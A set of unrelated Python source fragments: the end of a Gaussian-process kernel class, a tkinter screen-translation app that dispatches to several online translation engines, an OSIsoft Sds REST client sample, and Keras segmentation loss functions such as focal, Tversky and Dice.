return PP0Kernel(self.lengthscale, self.output_variance, self.eff_dimensions)
def __repr__(self):
return 'PP0Kernel(lengthscale=%f, output_variance=%f, eff_dimensions=%s)' % (self.lengthscale,
self.output_variance, '['+','.join([str(x) for x in self.eff_dimensions])+']')
| |
# Internal
import tkinter as tk
import subprocess
import asyncio
import os
from time import localtime, strftime
# Ext
import webbrowser
# User Defined
from screen_translate.JsonHandling import JsonHandler
from screen_translate.LangCode import *
from screen_translate.Mbox import Mbox
from screeninfo import get_monitors
# ---------------------------------------------------------------
# Settings to capture all screens
from PIL import ImageGrab
from functools import partial
ImageGrab.grab = partial(ImageGrab.grab, all_screens=True)
# Add try except to intercept connection error
try:
from screen_translate.Translate import *
except Exception as e:
print("Error", str(e))
Mbox("Error", e, 2)
try:
from screen_translate.Translate_Deepl import *
except Exception as e:
print("Error", str(e))
Mbox("Error", e, 2)
# ---------------------------------------------------------------
# --------------------- Public Classes --------------------------
# ---------------------------------------------------------------
class Global_Class:
"""
Class containing all the static variables for the UI. It also contains some methods
for the stuff to works, such as the hotkey callback, the translate method, etc.
Stored like this in order to allow other file to use the same thing without circular import error.
"""
def __init__(self):
# Create gimmick window to store global var
self.gimmickWindow = tk.Tk()
self.gimmickWindow.withdraw()
# Reference main ui
self.main = None
self.main_Ui = None
# Text box
self.text_Box_Top_Var = tk.StringVar()
self.text_Box_Bottom_Var = tk.StringVar()
# Flag variables
self.hotkeyCapTlPressed = False
self.hotkeySnipCapTlPressed = False
self.capUiHidden = True
# Capture opacities
self.curCapOpacity = 0.8
self.captureSlider_Main = None
self.captureSlider_Cap = None
self.captureOpacityLabel_Main = None
self.captureOpacityLabel_CapSetting = None
# CB TL
self.langTo = None
self.langFrom = None # This needs to change every time the user changes the language, and on init
self.engine = None
self.mboxOpen = False
# Version
self.version = "1.8.4"
self.versionType = "release"
self.newVerStatusCache = None
# Logo
self.logoPath = None
# Query box
self.queryBg = None
self.queryFg = None
self.queryFont = None
# Result box
self.resultBg = None
self.resultFg = None
self.resultFont = None
# Status lbl
self.programStatusLabel = None
self.connectionStatusLabel = None
# Log
self.logVar = None
def setConnected(self):
self.connectionStatusLabel.config(fg="green")
self.main_Ui.update_idletasks()
def setDisconnected(self):
self.connectionStatusLabel.config(fg="red")
self.main_Ui.update_idletasks()
def statusChange(self, newStatus, settings):
if settings['logging']['enabled']:
maxLine = settings['logging']['max_line']
if maxLine < 1:
maxLine = 1
elif maxLine > 1000:
maxLine = 1000
oldText = self.logVar.get()
currTime = strftime("%H:%M:%S", localtime())
nlines = len(oldText.splitlines())
if nlines == maxLine:
# Remove the first line
oldText = oldText.splitlines()[1:]
oldText = "\n".join(oldText)
oldText += f"\n[{currTime}] {newStatus}"
self.logVar.set(oldText)
def set_Status_Ready(self):
self.programStatusLabel.config(fg="green")
self.main_Ui.update_idletasks()
def set_Status_Busy(self):
self.programStatusLabel.config(fg="blue")
self.main_Ui.update_idletasks()
def set_Status_Warning(self):
self.programStatusLabel.config(fg="#f7bd01")
self.main_Ui.update_idletasks()
def set_Status_Error(self):
self.programStatusLabel.config(fg="red")
self.main_Ui.update_idletasks()
def hotkeyCapTLCallback(self):
"""Callback for the hotkey to capture the screen"""
self.hotkeyCapTlPressed = True
def hotkeySnipCapTLCallback(self):
"""Callback for the hotkey to snip the screen"""
self.hotkeySnipCapTlPressed = True
# Translate
def translate(self, settings):
"""Translate the text"""
self.set_Status_Busy()
self.statusChange(f"Translating from {self.langFrom} to {self.langTo} using {self.engine}", settings)
# Only check the langfrom and langto if it is translating
if self.engine != "None":
# If source and destination are the same
if self.langFrom == self.langTo:
self.set_Status_Error()
self.statusChange("Error: Language target is the same as source", settings)
Mbox("Error: Language target is the same as source", "Language target is the same as source! Please choose a different language", 2, self.main_Ui)
print("Error: Language target is the same as source! Please choose a different language")
self.set_Status_Warning()
return
# If langto not set
if self.langTo == "Auto-Detect":
self.set_Status_Error()
self.statusChange("Error: Invalid Language Selected", settings)
Mbox("Error: Invalid Language Selected", "Must specify language destination", 2, self.main_Ui)
print("Error: Invalid Language Selected! Must specify language destination")
self.set_Status_Warning()
return
# Get the text from the textbox
query = self.text_Box_Top_Var.get()
# Read settings
showAlert = settings["show_no_text_alert"]
historyIsSaved = settings['saveHistory']
# If the text is empty
if len(query) < 1:
self.set_Status_Warning()
self.statusChange("No text entered! Please enter some text", settings)
print("Error: No text entered! Please enter some text")
# If show alert is true then show a message box alert, else don't show any popup
if showAlert:
Mbox("Error: No text entered", "Please enter some text", 2, self.main_Ui)
return
# Translate
# --------------------------------
# Google Translate
if self.engine == "Google Translate":
oldMethod = False
if "- Alt" in self.langFrom or "- Alt" in self.langTo:
oldMethod = True
isSuccess, translateResult = google_tl(query, self.langTo, self.langFrom, oldMethod=oldMethod)
self.fillTextBoxAndSaveHistory(isSuccess, query, translateResult, historyIsSaved, settings)
# --------------------------------
# Deepl
elif self.engine == "Deepl":
loop = asyncio.get_event_loop()
loop.run_until_complete(self.getDeeplTl(query, self.langTo, self.langFrom, historyIsSaved, settings))
# --------------------------------
# MyMemoryTranslator
elif self.engine == "MyMemoryTranslator":
isSuccess, translateResult = memory_tl(query, self.langTo, self.langFrom)
self.fillTextBoxAndSaveHistory(isSuccess, query, translateResult, historyIsSaved, settings)
# --------------------------------
# PONS
elif self.engine == "PONS":
isSuccess, translateResult = pons_tl(query, self.langTo, self.langFrom)
self.fillTextBoxAndSaveHistory(isSuccess, query, translateResult, historyIsSaved, settings)
# --------------------------------
# LibreTranslate
elif self.engine == "LibreTranslate":
isSuccess, translateResult = libre_tl(query, self.langTo, self.langFrom, https=settings['libreTl']['https'], host=settings['libreTl']['host'], port=settings['libreTl']['port'], apiKeys=settings['libreTl']['api_key'])
self.fillTextBoxAndSaveHistory(isSuccess, query, translateResult, historyIsSaved, settings)
# --------------------------------
# Wrong opts
else:
print("Please select a correct engine")
Mbox("Error: Engine Not Set!", "Please select a correct engine", 2, self.main_Ui)
# Get Deepl TL
async def getDeeplTl(self, text, langTo, langFrom, saveToHistory, settings):
"""Get the translated text from deepl.<EMAIL>"""
isSuccess, translateResult = await deepl_tl(text, langTo, langFrom)
self.fillTextBoxAndSaveHistory(isSuccess, text, translateResult, saveToHistory, settings)
# Save to History
def fillTextBoxAndSaveHistory(self, isSuccess, query, translateResult, saveToHistory, settings):
"""Save the text to history"""
if isSuccess:
self.text_Box_Bottom_Var.set(translateResult)
if saveToHistory:
# Write to History
new_data = {
"from": self.langFrom,
"to": self.langTo,
"query": query,
"result": translateResult,
"engine": self.engine
}
fJson.writeAdd_History(new_data)
self.statusChange("Saved translation to history", settings)
self.statusChange("Successfully translated the text", settings)
self.set_Status_Ready()
else:
self.set_Status_Error()
self.statusChange("Fail to translate and save to history", settings)
Mbox("Error: Translation Failed", translateResult, 2, self.main_Ui)
self.set_Status_Warning()
# Allowed keys
def allowedKey(self, event):
key = event.keysym
# Allow
if key.lower() in ['left', 'right']: # Arrow left right
return
if event.state == 4 and key == 'a': # Ctrl + a
return
if event.state == 4 and key == 'c': # Ctrl + c
return
# If not allowed
return "break"
# ---------------------------------------------------------------
"""
TextWithVar, taken from: https://stackoverflow.com/questions/21507178/tkinter-text-binding-a-variable-to-widget-text-contents
"""
class TextWithVar(tk.Text):
'''A text widget that accepts a 'textvariable' option'''
def __init__(self, parent, *args, **kwargs):
try:
self._textvariable = kwargs.pop("textvariable")
except KeyError:
self._textvariable = None
tk.Text.__init__(self, parent, *args, **kwargs)
# if the variable has data in it, use it to initialize
# the widget
if self._textvariable is not None:
self.insert("1.0", self._textvariable.get())
# this defines an internal proxy which generates a
# virtual event whenever text is inserted or deleted
self.tk.eval('''
proc widget_proxy {widget widget_command args} {
# call the real tk widget command with the real args
set result [uplevel [linsert $args 0 $widget_command]]
# if the contents changed, generate an event we can bind to
if {([lindex $args 0] in {insert replace delete})} {
event generate $widget <<Change>> -when tail
}
# return the result from the real widget command
return $result
}
''')
# this replaces the underlying widget with the proxy
self.tk.eval('''
rename {widget} _{widget}
interp alias {{}} ::{widget} {{}} widget_proxy {widget} _{widget}
'''.format(widget=str(self)))
# set up a binding to update the variable whenever
# the widget changes
self.bind("<<Change>>", self._on_widget_change)
# set up a trace to update the text widget when the
# variable changes
if self._textvariable is not None:
self._textvariable.trace("wu", self._on_var_change)
def _on_var_change(self, *args):
'''Change the text widget when the associated textvariable changes'''
# only change the widget if something actually
# changed, otherwise we'll get into an endless
# loop
text_current = self.get("1.0", "end-1c")
var_current = self._textvariable.get()
if text_current != var_current:
self.delete("1.0", "end")
self.insert("1.0", var_current)
def _on_widget_change(self, event=None):
'''Change the variable when the widget changes'''
if self._textvariable is not None:
self._textvariable.set(self.get("1.0", "end-1c"))
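# --- Hedged usage sketch (requires a display; names are illustrative) ---
# The Tcl proxy above keeps the widget and its StringVar in sync both ways.
# root = tk.Tk()
# var = tk.StringVar(value="hello")
# box = TextWithVar(root, textvariable=var, height=3)
# box.pack()
# var.set("updated from the variable")  # widget text follows the variable
# # typing in the widget updates var via the <<Change>> binding
# root.mainloop()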
# ---------------------------------------------------------------
# Tooltip
"""
Original from: https://stackoverflow.com/questions/3221956/how-do-i-display-tooltips-in-tkinter
"""
class CreateToolTip(object):
"""
create a tooltip for a given widget
"""
def __init__(self, widget, text='widget info', delay=250, wraplength=180, opacity=1.0, always_on_top=True):
self.waittime = delay # milliseconds
self.wraplength = wraplength # pixels
self.widget = widget
self.text = text
self.opacity = opacity
self.always_on_top = always_on_top
self.widget.bind("<Enter>", self.enter)
self.widget.bind("<Leave>", self.leave)
self.widget.bind("<ButtonPress>", self.leave)
self.id = None
self.tw = None
def enter(self, event=None):
self.schedule()
def leave(self, event=None):
self.unschedule()
self.hidetip()
def schedule(self):
self.unschedule()
self.id = self.widget.after(self.waittime, self.showtip)
def unschedule(self):
id = self.id
self.id = None
if id:
self.widget.after_cancel(id)
def showtip(self, event=None):
x = y = 0
x, y, cx, cy = self.widget.bbox("insert")
x += self.widget.winfo_rootx() + 25
y += self.widget.winfo_rooty() + 20
# creates a toplevel window
self.tw = tk.Toplevel(self.widget)
# Make it stay on top
self.tw.wm_attributes('-topmost', self.always_on_top)
# Make it a little transparent
self.tw.wm_attributes('-alpha', self.opacity)
# Leaves only the label and removes the app window
self.tw.wm_overrideredirect(True)
self.tw.wm_geometry("+%d+%d" % (x, y))
| |
# Source: hanhossain/OCS-Samples, basic_samples/SDS/Python/SDSPy/Python2/SdsClient.py
# SdsClient.py
#
# Copyright (C) 2018 OSIsoft, LLC. All rights reserved.
#
# THIS SOFTWARE CONTAINS CONFIDENTIAL INFORMATION AND TRADE SECRETS OF
# OSIsoft, LLC. USE, DISCLOSURE, OR REPRODUCTION IS PROHIBITED WITHOUT
# THE PRIOR EXPRESS WRITTEN PERMISSION OF OSIsoft, LLC.
#
# RESTRICTED RIGHTS LEGEND
# Use, duplication, or disclosure by the Government is subject to restrictions
# as set forth in subparagraph (c)(1)(ii) of the Rights in Technical Data and
# Computer Software clause at DFARS 252.227.7013
#
# OSIsoft, LLC
# 1600 Alvarado St, San Leandro, CA 94577
import urlparse
import json
import adal as adal
from SdsError import SdsError
from SdsType import SdsType
from SdsStream import SdsStream
from SdsStreamView import SdsStreamView
from SdsStreamViewMap import SdsStreamViewMap
from SdsBoundaryType import SdsBoundaryType
from Dataview import Dataview
from Datagroup import Datagroup
import requests
import time
class SdsClient(object):
"""Handles communication with Sds Service"""
def __init__(self, apiVersion, tenant, url, resource, authority, clientId, clientSecret):
self.__apiVersion = apiVersion
self.__tenant = tenant
self.__url = url
self.__resource = resource
self.__clientId = clientId
self.__clientSecret = clientSecret
self.__authority = authority
self.__token = ""
self.__expiration = 0
self.__getToken()
self.__setPathAndQueryTemplates()
@property
def Uri(self):
return self.__url
def getType(self, namespace_id, type_id):
"""Retrieves the type specified by 'type_id' from Sds Service"""
if namespace_id is None:
raise TypeError
if type_id is None:
raise TypeError
response = requests.get(
self.__url + self.__typesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, type_id=type_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get SdsType, {type_id}. {status}:{reason}".
format(type_id=type_id, status=response.status_code, reason=response.text))
type = SdsType.fromJson(json.loads(response.content))
response.close()
return type
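# --- Hedged usage sketch (every id and credential below is a placeholder) ---
# client = SdsClient(apiVersion="v1", tenant="<tenant-id>",
#                    url="https://<ocs-endpoint>", resource="<resource>",
#                    authority="<authority-url>", clientId="<client-id>",
#                    clientSecret="<client-secret>")
# wave_type = client.getType("<namespace-id>", "<type-id>")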
def getTypeReferenceCount(self, namespace_id, type_id):
"""Retrieves the number of times the type is referenced"""
if namespace_id is None:
raise TypeError
if type_id is None:
raise TypeError
response = requests.get(
self.__url + self.__typesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, type_id=type_id) + "/ReferenceCount",
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get SdsType reference count, {type_id}. {status}:{reason}".
format(type_id=type_id, status=response.status_code, reason=response.text))
count = json.loads(response.content)
response.close()
return int(count)
def getTypes(self, namespace_id, skip=0, count=100):
"""Retrieves a list of types associated with the specified 'namespace_id' under the current tenant"""
if namespace_id is None:
raise TypeError
response = requests.get(
self.__url + self.__getTypesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, skip=skip, count=count),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get all SdsTypes. {status}:{reason}".
format(status=response.status_code, reason=response.text))
types = json.loads(response.content)
results = []
for t in types:
results.append(SdsType.fromJson(t))
response.close()
return results
def getOrCreateType(self, namespace_id, type):
"""Tells Sds Service to create a type based on local 'type' or get if existing type matches"""
if namespace_id is None:
raise TypeError
if type is None or not isinstance(type, SdsType):
raise TypeError
response = requests.post(
self.__url + self.__typesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, type_id=type.Id),
data=type.toJson(),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError(
"Failed to create type, {type_id}. {status}:{reason}".format(type_id=type.Id, status=response.status_code, reason=response.text))
type = SdsType.fromJson(json.loads(response.content))
response.close()
return type
def createOrUpdateType(self, namespace_id, type):
"""Tells Sds Service to create a type based on local 'type' object"""
if namespace_id is None:
raise TypeError
if type is None or not isinstance(type, SdsType):
raise TypeError
response = requests.put(
self.__url + self.__typesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, type_id=type.Id),
data=type.toJson(), headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError(
"Failed to create type, {type_id}. {status}:{reason}".format(type_id=type.Id, status=response.status_code, reason=response.text))
response.close()
def deleteType(self, namespace_id, type_id):
"""Tells Sds Service to delete the type specified by 'type_id'"""
if namespace_id is None:
raise TypeError
if type_id is None:
raise TypeError
response = requests.delete(
self.__url + self.__typesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, type_id=type_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to delete SdsType, {type_id}. {status}:{reason}".
format(type_id=type_id, status=response.status_code, reason=response.text))
response.close()
def getStreamView(self, namespace_id, streamView_id):
"""Retrieves the streamView specified by 'streamView_id' from Sds Service"""
if namespace_id is None:
raise TypeError
if streamView_id is None:
raise TypeError
response = requests.get(
self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id,
streamView_id=streamView_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get SdsStreamView, {streamView_id}. {status}:{reason}".
format(streamView_id=streamView_id, status=response.status_code, reason=response.text))
streamView = SdsStreamView.fromJson(json.loads(response.content))
response.close()
return streamView
def getStreamViewMap(self, namespace_id, streamView_id):
"""Retrieves the streamView map specified by 'streamView_id' from Sds Service"""
if namespace_id is None:
raise TypeError
if streamView_id is None:
raise TypeError
response = requests.get(
self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, streamView_id=streamView_id) + "/Map",
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get SdsStreamView, {streamView_id}. {status}:{reason}".
format(streamView_id=streamView_id, status=response.status_code, reason=response.text))
streamViewMap = SdsStreamViewMap.fromJson(json.loads(response.content))
response.close()
return streamViewMap
def getStreamViews(self, namespace_id, skip=0, count=100):
"""Retrieves a list of streamViews associated with the specified 'namespace_id' under the current tenant"""
if namespace_id is None:
raise TypeError
response = requests.get(
self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, skip=skip, count=count),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get all SdsStreamViews. {status}:{reason}".
format(status=response.status_code, reason=response.text))
content = json.loads(response.content)
results = []
for item in content:
results.append(SdsStreamView.fromJson(item))
response.close()
return results
def getOrCreateStreamView(self, namespace_id, streamView):
"""Tells Sds Service to create a streamView based on a local SdsStreamView object"""
if namespace_id is None:
raise TypeError
if streamView is None or not isinstance(streamView, SdsStreamView):
raise TypeError
response = requests.post(
self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, streamView_id=streamView.Id),
data=streamView.toJson(),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to create SdsStreamView, {streamView_id}. {status}:{reason}".
format(streamView_id=streamView.Id, status=response.status_code, reason=response.text))
streamView = SdsStreamView.fromJson(json.loads(response.content))
response.close()
return streamView
def createOrUpdateStreamView(self, namespace_id, streamView):
"""Tells Sds Service to create a streamView based on a local SdsStreamView object"""
if namespace_id is None:
raise TypeError
if streamView is None or not isinstance(streamView, SdsStreamView):
raise TypeError
response = requests.put(
self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, streamView_id=streamView.Id),
data=streamView.toJson(),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to create SdsStreamView, {streamView_id}. {status}:{reason}".
format(streamView_id=streamView.Id, status=response.status_code, reason=response.text))
response.close()
def deleteStreamView(self, namespace_id, streamView_id):
"""Tells Sds Service to delete the streamView with the specified 'streamView_id'"""
if namespace_id is None:
raise TypeError
if streamView_id is None:
raise TypeError
response = requests.delete(
self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, streamView_id=streamView_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to delete SdsStreamView, {streamView_id}. {status}:{reason}".
format(streamView_id=streamView_id, status=response.status_code, reason=response.text))
response.close()
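# --- Hypothetical refactoring sketch (not part of the original sample) ---
# Every request above repeats the same status check; a helper like this would
# centralize it. Shown only to make the shared pattern explicit.
def _raise_on_error(response, action):
    """Close the response and raise SdsError if the status is not 2xx."""
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to {action}. {status}:{reason}".format(
            action=action, status=response.status_code, reason=response.text))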
def getStream(self, namespace_id, stream_id):
"""Retrieves a stream specified by 'stream_id' from the Sds Service"""
if namespace_id is None:
raise TypeError
if stream_id is None:
raise TypeError
response = requests.get(
self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get SdsStream, {stream_id}. {status}:{reason}".
format(stream_id=stream_id, status=response.status_code, reason=response.text))
stream = SdsStream.fromJson(json.loads(response.content))
response.close()
return stream
def getStreamType(self, namespace_id, stream_id):
"""Retrieves a stream specified by 'stream_id' from the Sds Service"""
if namespace_id is None:
raise TypeError
if stream_id is None:
raise TypeError
response = requests.get(
self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id) + "/Type",
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get SdsStream, {stream_id}. {status}:{reason}".
format(stream_id=stream_id, status=response.status_code, reason=response.text))
type = SdsType.fromJson(json.loads(response.content))
response.close()
return type
def getStreams(self, namespace_id, query="", skip=0, count=100):
"""Retrieves a list of streams associated with 'namespace_id' under the current tenant"""
if namespace_id is None:
raise TypeError
if query is None:
raise TypeError
response = requests.get(
self.__url + self.__getStreamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, query=query, skip=skip, count=count),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get all SdsStreams. {status}:{reason}".
format(status=response.status_code, reason=response.text))
content = json.loads(response.content)
results = []
for item in content:
results.append(SdsStream.fromJson(item))
response.close()
return results
def getOrCreateStream(self, namespace_id, stream):
"""Tells Sds Service to create a stream based on the local 'stream' SdsStream object"""
if namespace_id is None:
raise TypeError
if stream is None or not isinstance(stream, SdsStream):
raise TypeError
response = requests.post(
self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream.Id),
data=stream.toJson(),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to create SdsStream, {stream_id}. {status}:{reason}".
format(stream_id=stream.Id, status=response.status_code, reason=response.text))
stream = SdsStream.fromJson(json.loads(response.content))
response.close()
return stream
def createOrUpdateStream(self, namespace_id, stream):
"""Tells Sds Service to create a stream based on the local 'stream' SdsStream object"""
if namespace_id is None:
raise TypeError
if stream is None or not isinstance(stream, SdsStream):
raise TypeError
response = requests.put(
self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream.Id),
data=stream.toJson(),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to create SdsStream, {stream_id}. {status}:{reason}".
format(stream_id=stream.Id, status=response.status_code, reason=response.text))
response.close()
def deleteStream(self, namespace_id, stream_id):
"""Tells Sds Service to delete the stream speficied by 'stream_id'"""
if namespace_id is | |
from keras import backend as K
import tensorflow as tf
import numpy as np
def focal_loss(gamma=2., alpha=4.):
gamma = float(gamma)
alpha = float(alpha)
def focal_loss_fixed(y_true, y_pred):
"""Focal loss for multi-classification
FL(p_t)=-alpha(1-p_t)^{gamma}ln(p_t)
Notice: y_pred is probability after softmax
gradient is d(Fl)/d(p_t) not d(Fl)/d(x) as described in paper
d(Fl)/d(p_t) * [p_t(1-p_t)] = d(Fl)/d(x)
Focal Loss for Dense Object Detection
https://arxiv.org/abs/1708.02002
Arguments:
y_true {tensor} -- ground truth labels, shape of [batch_size, num_cls]
y_pred {tensor} -- model's output, shape of [batch_size, num_cls]
Keyword Arguments:
gamma {float} -- (default: {2.0})
alpha {float} -- (default: {4.0})
Returns:
[tensor] -- loss.
"""
epsilon = 1.e-9
y_true = tf.convert_to_tensor(y_true, tf.float32)
y_pred = tf.convert_to_tensor(y_pred, tf.float32)
model_out = tf.add(y_pred, epsilon)
ce = tf.multiply(y_true, -tf.log(model_out))
weight = tf.multiply(y_true, tf.pow(tf.subtract(1., model_out), gamma))
fl = tf.multiply(alpha, tf.multiply(weight, ce))
reduced_fl = tf.reduce_max(fl, axis=1)
return tf.reduce_mean(reduced_fl)
return focal_loss_fixed
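# --- Hedged numeric sketch of the same focal-loss formula in plain NumPy ---
# Illustrates the down-weighting: the more confident a correct prediction,
# the more (1 - p_t)**gamma shrinks its contribution.
def _focal_loss_np(y_true, y_pred, gamma=2., alpha=4., eps=1e-9):
    p = y_pred + eps
    fl = alpha * y_true * (1. - p) ** gamma * -np.log(p)
    return np.max(fl, axis=1).mean()   # mirrors reduce_max, then reduce_mean

print(_focal_loss_np(np.array([[0., 1.]]), np.array([[0.1, 0.9]])))  # ~0.004
print(_focal_loss_np(np.array([[0., 1.]]), np.array([[0.5, 0.5]])))  # ~0.693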
def weighted_categorical_crossentropy(weights=None):
""" weighted_categorical_crossentropy
Args:
* weights<ktensor|nparray|list>: crossentropy weights
Returns:
* weighted categorical crossentropy function
"""
def loss(y_true, y_pred):
labels_floats = tf.cast(y_true, tf.float32)
per_pixel_loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=labels_floats,logits=y_pred)
if weights is not None:
weight_mask = tf.maximum(tf.reduce_max(tf.constant(
np.array(weights, dtype=np.float32)[None, None, None])
* labels_floats, axis=-1), 1.0)
per_pixel_loss = per_pixel_loss * weight_mask[:, :, :, None]
return tf.reduce_mean(per_pixel_loss)
return loss
def image_categorical_cross_entropy(y_true, y_pred, weights=None):
"""
:param y_true: tensor of shape (batch_size, height, width, num_classes) representing the ground truth.
:param y_pred: tensor of shape (batch_size, height, width, num_classes) representing the prediction logits.
:return: The mean sigmoid cross-entropy, computed from the logits.
"""
labels_floats = tf.cast(y_true, tf.float32)
per_pixel_loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=labels_floats,logits=y_pred)
if weights is not None:
weight_mask = tf.maximum(
tf.reduce_max(tf.constant(
np.array(weights, dtype=np.float32)[None, None, None])
* labels_floats, axis=-1), 1.0)
per_pixel_loss = per_pixel_loss * weight_mask[:, :, :, None]
return tf.reduce_mean(per_pixel_loss)
def class_tversky(y_true, y_pred):
smooth = 1.0
y_true = K.permute_dimensions(y_true, (3,1,2,0))
y_pred = K.permute_dimensions(y_pred, (3,1,2,0))
y_true_pos = K.batch_flatten(y_true)
y_pred_pos = K.batch_flatten(y_pred)
true_pos = K.sum(y_true_pos * y_pred_pos, 1)
false_neg = K.sum(y_true_pos * (1-y_pred_pos), 1)
false_pos = K.sum((1-y_true_pos)*y_pred_pos, 1)
alpha = 0.2 # previously 0.5
beta = 0.8
return (true_pos + smooth)/(true_pos + alpha*false_neg + (beta)*false_pos + smooth)
def focal_tversky_loss(y_true,y_pred):
pt_1 = class_tversky(y_true, y_pred)
gamma = 1.3 # other values tried: 4./3., 0.75
return K.sum(K.pow((1-pt_1), gamma))
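# --- Hedged numeric sketch of the Tversky index computed above ---
# With alpha=0.2 on false negatives and beta=0.8 on false positives, missed
# pixels are penalized less than spurious ones; alpha = beta = 0.5 recovers
# the Dice coefficient.
_tp, _fn, _fp, _smooth = 10., 4., 1., 1.0
print((_tp + _smooth) / (_tp + 0.2 * _fn + 0.8 * _fp + _smooth))  # ~0.873
print((_tp + _smooth) / (_tp + 0.5 * _fn + 0.5 * _fp + _smooth))  # Dice, ~0.815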
def generalized_dice_coeff2(y_true, y_pred):
n_el = 1
for dim in y_true.shape:
n_el *= int(dim)
n_cl = y_true.shape[-1]
w = K.zeros(shape=(n_cl,))
w = (K.sum(y_true, axis=(0,1,2)))/(n_el)
w = 1/(w**2+0.000001)
numerator = y_true*y_pred
numerator = w*K.sum(numerator,(0,1,2))
numerator = K.sum(numerator)
denominator = y_true+y_pred
denominator = w*K.sum(denominator,(0,1,2))
denominator = K.sum(denominator)
return 2*numerator/denominator
def generalized_dice_coeff(y_true, y_pred):
axes = tuple(range(1, len(y_pred.shape)-1))
Ncl = y_pred.shape[-1]
w = K.zeros(shape=(Ncl,))
w = K.sum(y_true, axis=axes)
w = 1/(w**2+0.000001)
# Compute gen dice coef:
numerator = y_true*y_pred
numerator = w*K.sum(numerator,axes)
numerator = K.sum(numerator)
denominator = y_true+y_pred
denominator = w*K.sum(denominator,axes)
denominator = K.sum(denominator)
gen_dice_coef = 2*numerator/denominator
return gen_dice_coef
def generalized_dice_loss(y_true, y_pred):
return 1 - generalized_dice_coeff2(y_true, y_pred)
def soft_dice_loss(y_true, y_pred, epsilon=1e-6):
'''
Soft dice loss calculation for arbitrary batch size, number of classes, and number of spatial dimensions.
Assumes the `channels_last` format.
# Arguments
y_true: b x X x Y( x Z...) x c One hot encoding of ground truth
y_pred: b x X x Y( x Z...) x c Network output, must sum to 1 over c channel (such as after softmax)
epsilon: Used for numerical stability to avoid divide by zero errors
# References
V-Net: Fully Convolutional Neural Networks for Volumetric Medical Image Segmentation
https://arxiv.org/abs/1606.04797
More details on Dice loss formulation
https://mediatum.ub.tum.de/doc/1395260/1395260.pdf (page 72)
Adapted from https://github.com/Lasagne/Recipes/issues/99#issuecomment-347775022
'''
# skip the batch and class axis for calculating Dice score
axes = tuple(range(1, len(y_pred.shape)-1))
numerator = 2. * K.sum(y_pred * y_true, axes)
denominator = K.sum(K.square(y_pred) + K.square(y_true), axes)
return 1.00 - K.mean(numerator / (denominator + epsilon)) # average over classes and batch
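# --- Hedged NumPy check of the algebra above ---
# Because the mean runs over all classes, classes absent from both y_true and
# y_pred contribute a ratio of 0, so even a perfect one-class prediction does
# not reach a loss of 0 (seg_metrics below masks absent classes instead).
_y = np.zeros((1, 2, 2, 3)); _y[..., 0] = 1.   # perfect prediction of class 0
_num = 2. * (_y * _y).sum(axis=(1, 2))
_den = (_y ** 2 + _y ** 2).sum(axis=(1, 2))
print(1. - (_num / (_den + 1e-6)).mean())      # ~0.667 rather than 0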
def seg_metrics(y_true, y_pred, metric_name, metric_type='standard', drop_last = True, mean_per_class=False, verbose=False):
"""
Compute mean metrics of two segmentation masks, via Keras.
IoU(A,B) = |A & B| / (| A U B|)
